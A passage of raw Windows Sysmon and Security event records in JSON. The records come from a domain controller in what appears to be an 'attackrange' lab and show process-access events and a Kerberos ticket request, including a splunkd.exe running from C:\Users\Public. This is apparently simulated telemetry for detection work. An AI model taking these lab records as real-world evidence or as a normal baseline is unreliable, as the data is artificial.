C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6691,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6692,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6693,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6694,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.303\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B1-5F25-0000-00106C6E0900}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.303","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B1-5F25-0000-00106C6E0900}","TargetProcessId":"4820","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6695,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.428\r\nSourceProcessGUID: {E2A3D6B1-12B1-5F25-0000-00106C6E0900}\r\nSourceProcessId: 4820\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.428","SourceProcessGUID":"{E2A3D6B1-12B1-5F25-0000-00106C6E0900}","SourceProcessId":"4820","SourceThreadId":"4128","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6696,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6697,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:57.772\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:57.772","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 06:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220675,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tWIN-DC-8400769$@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{D2B11785-80FE-DC50-4342-8A46119CA671}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket 